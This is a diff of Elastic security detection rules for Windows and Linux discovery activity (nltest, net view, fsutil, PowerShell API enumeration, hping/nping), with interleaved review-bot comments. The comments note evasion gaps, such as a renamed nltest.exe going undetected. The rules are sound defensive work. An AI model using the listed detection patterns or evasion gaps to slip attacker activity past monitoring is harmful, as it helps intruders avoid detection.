+ "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "severity": "low",
+ "tags": [
+ "Elastic",
+ "Host",
+ "Windows",
+ "Threat Detection",
+ "Discovery"
],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1482",
+ "name": "Domain Trust Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1482/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_file_dir_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_file_dir_discovery.json
deleted file mode 100644
index 87f6d713d81fc..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_file_dir_discovery.json
+++ /dev/null
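Review bot: The new rule keys only on `process.name : "nltest.exe"`, whereas the AdFind and administrator-enumeration rules touched in this same change also accept `process.pe.original_file_name`, so a renamed copy of nltest.exe evades this rule but not its siblings. I would change the match to `(process.name : "nltest.exe" or process.pe.original_file_name == "nltest.exe") and process.args : (` and add `{ "ecs": true, "name": "process.pe.original_file_name", "type": "keyword" }` to `required_fields`. `"note": ""` also leaves the analyst without the triage guidance the sibling rules carry; a short note stating that the argument list is a prefix/wildcard match (`/DSGET*`, `/DCLIST:*`) and that `false_positives` expects legitimate use by domain administrators would help. `"version": 2` on a brand-new file may be intentional if the rule was authored upstream first, but is worth confirming.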
@@ -1,49 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Enumeration of files and directories using built-in tools. Adversaries may use the information discovered to plan follow-on activity.", - "false_positives": [ - "Enumeration of files and directories may not be inherently malicious and noise may come from scripts, automation tools, or normal command line usage. It's important to baseline your environment to determine the amount of expected noise and exclude any known FP's from the rule." - ], - "from": "now-9m", - "index": [ - "logs-endpoint.events.*", - "winlogbeat-*", - "logs-windows.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "File and Directory Discovery", - "note": "## Triage and analysis\n\n### Investigating File and Directory Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for three directory-listing commands in one minute, which can indicate attempts to locate valuable files,\nspecific file types or installed programs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", - "query": "sequence by agent.id, user.name with maxspan=1m\n[process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"cmd.exe\" or process.pe.original_file_name == \"Cmd.Exe\") and process.args : \"dir\") or\n process.name : \"tree.com\"]\n[process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"cmd.exe\" or process.pe.original_file_name == \"Cmd.Exe\") and process.args : \"dir\") or\n process.name : \"tree.com\"]\n[process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"cmd.exe\" or process.pe.original_file_name == \"Cmd.Exe\") and process.args : \"dir\") or\n process.name : \"tree.com\"]\n", - "risk_score": 21, - "rule_id": "7b08314d-47a0-4b71-ae4e-16544176924f", - "severity": "low", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Discovery" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": 
"https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1083", - "name": "File and Directory Discovery", - "reference": "https://attack.mitre.org/techniques/T1083/" - } - ] - } - ], - "type": "eql", - "version": 5 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json index 96860eb7e6f79..bad11ed877179 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json @@ -15,6 +15,23 @@ "license": "Elastic License v2", "name": "Enumeration of Kernel Modules", "query": "event.category:process and event.type:(start or process_started) and\n process.args:(kmod and list and sudo or sudo and (depmod or lsmod or modinfo))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2d8043ed-5bda-4caf-801c-c1feb7410504", "severity": "medium", @@ -44,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json index 8f8bb7c4f2e31..d5ba539a83e9d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json
@@ -18,6 +18,23 @@
 "references": [
 "https://en.wikipedia.org/wiki/Hping"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "90169566-2260-4824-b8e4-8615c3b4ed52",
 "severity": "high",
@@ -47,5 +64,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_nping_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_nping_activity.json
similarity index 59%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_nping_activity.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_nping_activity.json
index c9898b7414c09..4b9b6d122f347 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_nping_activity.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_nping_activity.json
@@ -18,6 +18,23 @@
 "references": [
 "https://en.wikipedia.org/wiki/Nmap"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "0d69150b-96f8-467c-a86d-a67a3378ce77",
 "severity": "medium",
@@ -25,9 +42,27 @@
 "Elastic",
 "Host",
 "Linux",
- "Threat Detection"
+ "Threat Detection",
+ "Discovery"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1046",
+ "name": "Network Service Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1046/"
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 7
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_information_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_information_discovery.json
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_information_discovery.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_information_discovery.json
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_configuration_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_configuration_discovery.json
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_configuration_discovery.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_configuration_discovery.json
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_connection_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_connection_discovery.json
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_connection_discovery.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_connection_discovery.json
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_process_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_process_discovery.json
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_process_discovery.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_process_discovery.json
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_user_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_user_discovery.json
similarity index 100%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_user_discovery.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_user_discovery.json
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json
index 1cdb1c5d8fb6d..a4f5e18d7f0f7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json
@@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Network Enumeration", - "note": "## Triage and analysis\n\n### Investigating Windows Network Enumeration\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` utility to enumerate servers in the environment that hosts shared drives\nor printers. This information is useful to attackers as they can identify targets for lateral movements and search for\nvaluable shared data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Network Enumeration\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` utility to enumerate servers in the environment that hosts shared drives\nor printers. This information is useful to attackers as they can identify targets for lateral movements and search for\nvaluable shared data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n (process.args : \"view\" or (process.args : \"time\" and process.args : \"\\\\\\\\*\"))\n\n\n /* expand when ancestry is available\n and not descendant of [process where event.type == (\"start\", \"process_started\") and process.name : \"cmd.exe\" and\n ((process.parent.name : \"userinit.exe\") or\n (process.parent.name : \"gpscript.exe\") or\n (process.parent.name : \"explorer.exe\" and\n process.args : \"C:\\\\*\\\\Start Menu\\\\Programs\\\\Startup\\\\*.bat*\"))]\n */\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
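Review bot: The new `required_fields` list in the discovery_net_view.json hunk omits `event.category`, although the query's `process where` clause is itself a constraint on that field, so someone reading `required_fields` alone would not see that the rule needs process-category events. If the list is generated from the query's explicit field references only, this is expected and a short mention in the PR description would settle it; otherwise consider adding `{ "ecs": true, "name": "event.category", "type": "keyword" }`. The same applies to the `process where` query in the discovery_peripheral_device.json hunk and the `network where` query in the discovery_post_exploitation_external_ip_lookup.json hunk. Moving the `## Config` paragraph out of `note` into the new `setup` field is done consistently across those hunks.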
@@ -48,5 +76,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json
index 3b6f09e4d1ac1..c40581ba63ee7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Peripheral Device Discovery", - "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to\nthe computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable\nmedia. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage\nservices.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and \n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to\nthe computer, 
which can be used to identify secondary drives used for backups, mapped network drives, and removable\nmedia. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage\nservices.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json index c5423d6c13eb4..56f5e6dfa8d3d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json 
@@ -14,14 +14,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Discovery Related Windows API Functions", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries\nlike PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not\ncontain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed.\nHowever, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries\nlike PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not\ncontain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed.\nHowever, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker 
and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity\n )\n", "references": [ "https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413", "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -88,5 +101,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } 
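Review bot: The new `setup` string in the discovery_posh_suspicious_api_functions.json hunk carries over the typo "with with" from the old `## Config` text; since the commit rewrites this text anyway, the line should read `Steps to implement the logging policy with Advanced Audit Configuration:`. Separately, `powershell.file.script_block_text` is declared with `"ecs": false` and `"type": "unknown"`, but the query's `: (NetShareEnum or ...)` match on function names inside a script block only behaves as intended when the field is mapped as an analyzed `text` field; under a keyword mapping the clause would require an exact whole-value match and the rule would effectively never fire. A sentence in `setup` naming the expected mapping (or the integration that provides it) would make that dependency visible to whoever enables the rule on a custom index.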
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json
index 6783b8053b157..1d1f7130a7a57 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json
